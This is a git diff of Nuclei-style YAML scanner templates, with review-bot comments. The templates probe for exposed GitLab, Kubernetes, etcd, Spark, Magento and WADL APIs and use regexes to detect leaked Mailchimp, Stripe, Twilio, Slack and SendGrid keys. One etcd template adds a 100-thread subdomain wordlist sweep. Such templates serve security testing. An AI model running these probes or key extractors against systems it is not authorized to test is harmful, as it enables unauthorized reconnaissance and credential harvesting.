@@ -1,22 +1,28 @@ id: gitlab-api-user-enum + info: - author: Suman_Kar name: GitLab - User Information Disclosure Via Open API + author: Suman_Kar severity: medium - reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: + max-request: 100 shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure -requests: + +http: - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} + payloads: uid: helpers/wordlists/numbers.txt stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -26,10 +32,14 @@ requests: - "username.*" - "id.*" - "name.*" + - type: word part: header words: - "application/json" + - type: status status: - 200 + +# digest: 4b0a00483046022100e91d88c0e5b8fc728356db398d1642b8928c8b06e2d15eb1b1d8aa7370e1ebe1022100f00de311f83fd9785f1655ac58104c405353183930d8524cc2802d7a98096df8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/gmail-api-client-secrets-7741.yaml b/poc/api/gmail-api-client-secrets-7741.yaml deleted file mode 100644 index 72f7d06ecc..0000000000 --- a/poc/api/gmail-api-client-secrets-7741.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: gmail-api-client-secrets - -info: - name: GMail API - Detect - author: geeknik - severity: info - description: GMail API was detected. - reference: https://developers.google.com/gmail/api/auth/web-server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/client_secrets.json" - - matchers-condition: and - matchers: - - type: word - words: - - "client_id" - - "auth_uri" - - "token_uri" - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - -# digest: 4a0a00473045022100e423f2d50edff69e6eb1b5bc47e8f482b97de447024a3623818e28a08199321a02207f96b638e3b21026d86306511d783491c0cc00d9484b54499fe7cfea40baead3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/google-api-key-7768.yaml b/poc/api/google-api-key-7768.yaml index 87d61eaa24..1d863c0dbe 100644 --- a/poc/api/google-api-key-7768.yaml +++ b/poc/api/google-api-key-7768.yaml @@ -1,23 +1,16 @@ id: google-api-key - info: name: Google API Key author: Swissky severity: info - metadata: - max-request: 2 tags: exposure,token,google - -http: +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/hopfully404" - extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" - -# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/graylog-api-browser-7846.yaml b/poc/api/graylog-api-browser-7846.yaml new file mode 100644 index 0000000000..6f78c1d3a8 --- /dev/null +++ b/poc/api/graylog-api-browser-7846.yaml 
@@ -0,0 +1,22 @@ +id: graylog-api-browser +info: + name: Detect Graylog REST API + author: PR3R00T + severity: info + tags: tech,graylog +requests: + - method: GET + path: + - "{{BaseURL}}/api/api-browser/" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Graylog" + - "REST API browser" + - "swagger" + condition: and + - type: status + status: + - 200 diff --git a/poc/api/graylog-api-browser.yaml b/poc/api/graylog-api-browser.yaml deleted file mode 100644 index 6c93a114fa..0000000000 --- a/poc/api/graylog-api-browser.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: graylog-api-browser - -info: - name: Detect Graylog REST API - author: PR3R00T - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/api/api-browser/" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Graylog" - - "REST API browser" - - "swagger" - condition: and - - type: status - status: - - 200 diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml deleted file mode 100644 index 1c523c0a06..0000000000 --- a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: http-etcd-unauthenticated-api-data-leak -info: - name: etcd Unauthenticated HTTP API Leak - author: dhiyaneshDk - severity: high - reference: https://hackerone.com/reports/1088429 - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and - matchers: - - type: word - words: - - '"roles"' - - '"permissions"' - - '"role"' - - '"kv"' - condition: and - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/plain" diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..ba35991570 --- /dev/null +++ b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml 
@@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth + +requests: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + matchers-condition: and + matchers: + - type: word + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/api/kube-api-namespaces-8505.yaml b/poc/api/kube-api-namespaces-8505.yaml new file mode 100644 index 0000000000..083c018d9d --- /dev/null +++ b/poc/api/kube-api-namespaces-8505.yaml @@ -0,0 +1,25 @@ +id: kube-api-namespaces +info: + name: Kube API Namespaces + author: sharath + severity: info + description: Scans for kube namespaces + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"NamespaceList":' + - '"items":' + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-namespaces-8506.yaml b/poc/api/kube-api-namespaces-8506.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces-8506.yaml +++ b/poc/api/kube-api-namespaces-8506.yaml 
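Review bot: `Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt` hard-codes an absolute path from one contributor's home directory, so the template cannot load its payload on any other machine and it publishes a local username. The raw request also takes its `Host` header from that list instead of from the scan target, and `threads: 100` is fixed in the template, so scope and request rate are no longer set by whoever runs the scan. I would drop the `payloads`, `attack` and `threads` keys and send `Host: {{Hostname}}`, as the GitLab template in this patch does. That makes the file equivalent to the plain `- "{{BaseURL}}/v2/auth/roles"` form used by poc/api/etcd-unauthenticated-api.yaml.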
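Review bot: The body matcher in poc/api/kube-api-namespaces-8505.yaml looks for the literal `"NamespaceList":`, that is, a JSON key, but a Kubernetes list response normally carries the type as a value (`"kind": "NamespaceList"`). With `condition: and` the template would therefore presumably never match a real API server; this should be confirmed against a test cluster. Matching the word `NamespaceList` without the trailing colon would avoid the miss. The pods, services and nodes templates in this patch use the same `"PodList":` / `"ServiceList":` / `"NodeList":` form.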
@@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/kube-api-nodes-8507.yaml b/poc/api/kube-api-nodes-8507.yaml index 0b108b7d35..29b885b67e 100644 --- a/poc/api/kube-api-nodes-8507.yaml +++ b/poc/api/kube-api-nodes-8507.yaml @@ -1,25 +1,25 @@ id: kube-api-nodes info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - '"NodeList":' - '"items":' - condition: and \ No newline at end of file + condition: and + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and diff --git a/poc/api/kube-api-nodes-8508.yaml b/poc/api/kube-api-nodes-8508.yaml deleted file mode 100644 index 29b885b67e..0000000000 --- a/poc/api/kube-api-nodes-8508.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath,ritikchaddha - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: or - matchers: - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and - - type: word - part: body - words: - - '"containerRuntimeVersion"' - - '"kubeletVersion": "v' - condition: and 
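Review bot: In poc/api/kube-api-nodes-8507.yaml, switching `matchers-condition` to `or` and deleting the status matcher means a hit is now decided on body content alone, whatever the response code. The added matcher is a better signal than `"NodeList":`, but the literal `'"kubeletVersion": "v'` depends on the space after the colon, so a compact JSON response would not match it. I would match `"kubeletVersion"` alone next to `"containerRuntimeVersion"` and keep the 200 check, for example by expressing the two alternatives plus `status_code == 200` as `dsl` matchers, the way the Magento template in this patch does.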
diff --git a/poc/api/kube-api-nodes.yaml b/poc/api/kube-api-nodes.yaml deleted file mode 100644 index 8e44c71d24..0000000000 --- a/poc/api/kube-api-nodes.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and diff --git a/poc/api/kube-api-pods-8510.yaml b/poc/api/kube-api-pods-8510.yaml index 2355efbaa9..c9cfbdb979 100644 --- a/poc/api/kube-api-pods-8510.yaml +++ b/poc/api/kube-api-pods-8510.yaml @@ -1,22 +1,26 @@ id: kube-api-pods + info: name: Kube API Pods author: sharath severity: info description: Scans for kube pods tags: tech,k8s,kubernetes,devops,kube + requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/pods" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - '"PodList":' - '"items":' - condition: and + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-pods.yaml b/poc/api/kube-api-pods.yaml new file mode 100644 index 0000000000..2355efbaa9 --- /dev/null +++ b/poc/api/kube-api-pods.yaml @@ -0,0 +1,22 @@ +id: kube-api-pods +info: + name: Kube API Pods + author: sharath + severity: info + description: Scans for kube pods + tags: tech,k8s,kubernetes,devops,kube +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/pods" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"PodList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-services-8513.yaml b/poc/api/kube-api-services-8513.yaml index bb3ef2795d..23f55153e4 100644 --- a/poc/api/kube-api-services-8513.yaml +++ b/poc/api/kube-api-services-8513.yaml 
@@ -1,15 +1,12 @@ id: kube-api-services - info: name: Kube API Services author: sharath severity: info description: Scans for kube services - metadata: - max-request: 1 tags: tech,k8s,kubernetes,devops,kube -http: +requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/services" @@ -25,6 +22,4 @@ http: words: - '"ServiceList":' - '"items":' - condition: and - -# digest: 4a0a0047304502202b0d9ac2494ecda58a3bfa5ad44584acf84d11b5e27bbcc97f267f0e6a425cdc022100d42f7df8fa23d59562f41fd65da5f3b2cea2a181b0234fec38d2bd43fff541c0:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-services-8514.yaml b/poc/api/kube-api-services-8514.yaml index 0fd4dad91f..c037f8f678 100644 --- a/poc/api/kube-api-services-8514.yaml +++ b/poc/api/kube-api-services-8514.yaml @@ -1,26 +1,22 @@ id: kube-api-services - info: name: Kube API Services author: sharath severity: info description: Scans for kube services tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/services" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"ServiceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/magento-2-exposed-api-8687.yaml b/poc/api/magento-2-exposed-api-8687.yaml index c5d33f7ec1..b249920ed9 100644 --- a/poc/api/magento-2-exposed-api-8687.yaml +++ b/poc/api/magento-2-exposed-api-8687.yaml 
@@ -4,7 +4,10 @@ info: author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + metadata: + shodan-query: http.component:"Magento" tags: magento requests: - method: GET diff --git a/poc/api/magento-2-exposed-api-8688.yaml b/poc/api/magento-2-exposed-api-8688.yaml new file mode 100644 index 0000000000..ddf8e7633a --- /dev/null +++ b/poc/api/magento-2-exposed-api-8688.yaml 
@@ -0,0 +1,45 @@ +id: magento-2-exposed-api + +info: + name: Exposed Magento 2 API + author: TechbrunchFR + severity: info + description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + metadata: + shodan-query: http.component:"Magento" + tags: magento + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/V1/products' + - '{{BaseURL}}/rest/V1/store/storeConfigs' + - '{{BaseURL}}/rest/V1/store/storeViews' + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(body, "searchCriteria")' + - 'contains(body, "parameters")' + - 'contains(body, "message")' + - 'contains(tolower(all_headers), "application/json")' + condition: and + + - type: dsl + dsl: + - 'contains(body, "secure_base_link_url")' + - 'contains(body, "timezone")' + - 'contains(tolower(all_headers), "application/json")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "name")' + - 'contains(body, "website_id")' + - 'contains(tolower(all_headers), "application/json")' + - 'status_code == 200' + condition: and \ No newline at end of file diff --git a/poc/api/mailchimp-api-key-8722.yaml b/poc/api/mailchimp-api-key-8722.yaml index fb0d8ec4c2..14819b8241 100644 --- a/poc/api/mailchimp-api-key-8722.yaml +++ b/poc/api/mailchimp-api-key-8722.yaml 
@@ -1,22 +1,20 @@ id: mailchimp-access-key-value - info: name: Mailchimp API Value author: puzzlepeaches - severity: info - metadata: - max-request: 1 - tags: exposure,token,mailchimp - -http: + severity: medium +requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" extractors: - type: regex part: body regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a0047304502207e0ab7518b414240980df385f972649a53d23d4cbdd9541a4b521a4785fd5f34022100d07a1f2d85bf26f3a817e8ccca7af3b238d06d93be9c3da1020682d0170d7fc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/mailchimp-api-key-8726.yaml b/poc/api/mailchimp-api-key-8726.yaml deleted file mode 100644 index 14819b8241..0000000000 --- a/poc/api/mailchimp-api-key-8726.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: mailchimp-access-key-value -info: - name: Mailchimp API Value - author: puzzlepeaches - severity: medium -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" - extractors: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/api/mailchimp-api.yaml b/poc/api/mailchimp-api.yaml index 09657f0502..7e5a4bad37 100644 --- a/poc/api/mailchimp-api.yaml +++ b/poc/api/mailchimp-api.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file,mailchimp + file: - extensions: - all @@ -13,5 +14,3 @@ file: - type: regex regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a00473045022044dc0414ef16f4cc2e54af8fb429d909233c3da5b9930d856d2d3a07caf5c184022100b714c99dcc1a53d01e2e20070ed6b094b841d629c949e98cef1ee1b382b8b1a4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/mailgun-api-11855.yaml b/poc/api/mailgun-api(1).yaml similarity index 100% rename from poc/api/mailgun-api-11855.yaml rename to poc/api/mailgun-api(1).yaml 
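Review bot: In poc/api/mailchimp-api-key-8722.yaml, `severity` rises from `info` to `medium` while the only evidence is the unanchored pattern `[0-9a-f]{32}-us[0-9]{1,2}`, which also matches the tail of any longer hex string that happens to be followed by `-us1`. The `tags` line is removed, so the template can no longer be selected or excluded by `exposure`, `token` or `mailchimp`. The new `matchers` block repeats the extractor's regex, and `matchers-condition: and` has no effect with a single matcher. I would keep `severity: info` and `tags: exposure,token,mailchimp`, and bound the pattern as `"\\b[0-9a-f]{32}-us[0-9]{1,2}\\b"` in the extractor only.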
diff --git a/poc/api/pictatic-api-key-9576.yaml b/poc/api/pictatic-api-key-9576.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/api/pictatic-api-key-9576.yaml +++ b/poc/api/pictatic-api-key-9576.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/api/pictatic-api-key.yaml b/poc/api/pictatic-api-key.yaml index 41ea01a136..946aed1ebf 100644 --- a/poc/api/pictatic-api-key.yaml +++ b/poc/api/pictatic-api-key.yaml @@ -1,5 +1,4 @@ id: pictatic-api-key - info: name: Pictatic API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "sk_live_[0-9a-z]{32}" - -# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/sendgrid-api-key-10140.yaml b/poc/api/sendgrid-api-key-10140.yaml index 88f920b11b..76506d7b27 100644 --- a/poc/api/sendgrid-api-key-10140.yaml +++ b/poc/api/sendgrid-api-key-10140.yaml @@ -3,7 +3,7 @@ info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,sendgrid requests: - method: GET path: diff --git a/poc/api/sendgrid-api.yaml b/poc/api/sendgrid-api.yaml index a67fb048a4..f8d5d81271 100644 --- a/poc/api/sendgrid-api.yaml +++ b/poc/api/sendgrid-api.yaml @@ -1,4 +1,5 @@ id: sendgrid-api-key-file + info: name: Sendgrid API Key author: gaurang @@ -7,7 +8,10 @@ info: file: - extensions: - all + extractors: - type: regex regex: - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" + +# digest: 4a0a00473045022100db3f9a4cb5ada6fcbe3bd6a463777cce68b4be7280b1525801bb93a81b89202602207901c7654fe5318ee02a07a99fee9560c2c840e9232933e9c4f49c5f7c7ea0a0:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/api/slack-api.yaml b/poc/api/slack-api.yaml index ea761c24d4..6f17ee55d5 100644 --- a/poc/api/slack-api.yaml +++ b/poc/api/slack-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "xox[baprs]-([0-9a-zA-Z]{10,48})?" + +# digest: 4b0a00483046022100ba3776e008af0a4e7848a73adf72eb7a16913a260d81182aeac50bc9d167c3d3022100d24a73474fbec04e1368b575900583a20922f4cc0fc702c636f53651fc17f939:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-documentation-10543.yaml b/poc/api/strapi-documentation-10542.yaml similarity index 100% rename from poc/api/strapi-documentation-10543.yaml rename to poc/api/strapi-documentation-10542.yaml diff --git a/poc/api/strapi-page-10544.yaml b/poc/api/strapi-page-10544.yaml index abec659651..d62760234f 100644 --- a/poc/api/strapi-page-10544.yaml +++ b/poc/api/strapi-page-10544.yaml @@ -3,7 +3,8 @@ info: name: Strapi Page author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 tags: api,strapi requests: - method: GET diff --git a/poc/api/strapi-page.yaml b/poc/api/strapi-page-10545.yaml similarity index 100% rename from poc/api/strapi-page.yaml rename to poc/api/strapi-page-10545.yaml diff --git a/poc/api/stripe-api-key(1).yaml b/poc/api/stripe-api-key(1).yaml new file mode 100644 index 0000000000..d65411c71f --- /dev/null +++ b/poc/api/stripe-api-key(1).yaml @@ -0,0 +1,16 @@ +id: stripe-api-key + +info: + name: Stripe API Key + author: gaurang + severity: high + tags: token,file,stripe + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key-11869.yaml b/poc/api/stripe-api-key-11869.yaml deleted file mode 100644 index 5624af050d..0000000000 
--- a/poc/api/stripe-api-key-11869.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: stripe-api-key -info: - name: Stripe API Key - author: gaurang - severity: high - tags: token,file,stripe -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/twilio-api-10860.yaml b/poc/api/twilio-api-10860.yaml new file mode 100644 index 0000000000..f1a98cc01b --- /dev/null +++ b/poc/api/twilio-api-10860.yaml @@ -0,0 +1,13 @@ +id: twilio-api +info: + name: Twilio API Key + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" diff --git a/poc/api/twilio-api-10861.yaml b/poc/api/twilio-api-10861.yaml deleted file mode 100644 index 9895746a8a..0000000000 --- a/poc/api/twilio-api-10861.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: twilio-api - -info: - name: Twilio API Key - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index 94674dffe2..9895746a8a 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file + file: - extensions: - all @@ -12,6 +13,4 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" - -# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/unauth-spark-api-10963.yaml b/poc/api/unauth-spark-api-10963.yaml index 504318c39a..5575a73ff9 100644 --- a/poc/api/unauth-spark-api-10963.yaml +++ b/poc/api/unauth-spark-api-10963.yaml 
@@ -3,26 +3,30 @@ id: unauth-spark-api info: name: Unauthenticated Spark REST API author: princechaddha - severity: medium + severity: critical description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: - https://xz.aliyun.com/t/2490 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. + metadata: + max-request: 1 tags: spark,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/v1/submissions" + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - "Missing an action" @@ -30,4 +34,4 @@ requests: part: body condition: and -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022018b659baec610f87c26890d0fb5845caeb74f982b891f1d7962fc76f1cc74819022100fbbd51799d7374a2ec8d0ce526872a8541093e2d98a549188fca7c8890f25681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/unauth-spark-api.yaml b/poc/api/unauth-spark-api.yaml deleted file mode 100644 index 2025d7145b..0000000000 --- a/poc/api/unauth-spark-api.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauth-spark-api -info: - name: Unauthenticated Spark REST API - author: princechaddha - severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - remediation: Restrict access the exposed API ports. - reference: https://xz.aliyun.com/t/2490 - tags: spark,unauth - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/v1/submissions" - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Missing an action" - - "serverSparkVersion" - part: body - condition: and - -# Enhanced by cs on 2022/02/28 
diff --git a/poc/api/wadl-api-11082.yaml b/poc/api/wadl-api-11082.yaml deleted file mode 100644 index 1e046a7ef3..0000000000 --- a/poc/api/wadl-api-11082.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wadl-api -info: - name: wadl file disclosure - author: 0xrudra,manuelbua - severity: info - tags: exposure,api - reference: - - https://github.com/dwisiswant0/wadl-dumper - - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ -requests: - - method: GET - path: - - "{{BaseURL}}/application.wadl" - - "{{BaseURL}}/application.wadl?detail=true" - - "{{BaseURL}}/api/application.wadl" - - "{{BaseURL}}/api/v1/application.wadl" - - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true - matchers: - - name: http-get - type: word - words: - - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" - - "http://wadl.dev.java.net/2009/02" - - method: OPTIONS - path: - - "{{BaseURL}}" - - "{{BaseURL}}/api/v1" - - "{{BaseURL}}/api/v2" - stop-at-first-match: true - matchers: - - name: http-options - type: word - words: - - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" - - "http://wadl.dev.java.net/2009/02" diff --git a/poc/api/wadl-api-11084.yaml b/poc/api/wadl-api-11084.yaml index 84a5ac47dd..35e018d786 100644 --- a/poc/api/wadl-api-11084.yaml +++ b/poc/api/wadl-api-11084.yaml @@ -1,22 +1,13 @@ id: wadl-api - info: - name: WADL API - Detect - author: 0xrudra,manuelbua + name: wadl file disclosure + author: 0xrudra & manuelbua severity: info - description: WADL API was detected. - reference: + tags: exposure,api + reference: | - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 8 - tags: exposure,api - -http: +requests: - method: GET path: - "{{BaseURL}}/application.wadl" 
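Review bot: In the first hunk of poc/api/wadl-api-11084.yaml, `reference: |` turns the two links into one multi-line string that still contains the leading `- ` of each item, where the previous version had a YAML list. `author: 0xrudra & manuelbua` likewise departs from the comma-separated form used by the other templates in this patch. I would write `reference:` followed by the two `- https://…` items and `author: 0xrudra,manuelbua`. The hunk also drops `description`, `classification` and `max-request: 8`, which leaves the finding with no explanation of what was detected.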
@@ -24,29 +15,26 @@ http: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - - stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" - + condition: or + part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - - stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" - -# digest: 4b0a00483046022100e2f839e3c09ac43f2fef563e3df53c2508374f88b7a6440f5b8e77a7dbefcc05022100a0f7c47efacbf012afecb48f03f8c1f63a337bf8b96061929d5a1de831f61d79:922c64590222798bb761d5b6d8e72950 + condition: or + part: body diff --git a/poc/api/wadl-api-11085.yaml b/poc/api/wadl-api-11085.yaml index 9f1cbe09ec..1e046a7ef3 100644 --- a/poc/api/wadl-api-11085.yaml +++ b/poc/api/wadl-api-11085.yaml @@ -1,5 +1,4 @@ id: wadl-api - info: name: wadl file disclosure author: 0xrudra,manuelbua @@ -8,7 +7,6 @@ info: reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - requests: - method: GET path: @@ -17,7 +15,6 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - 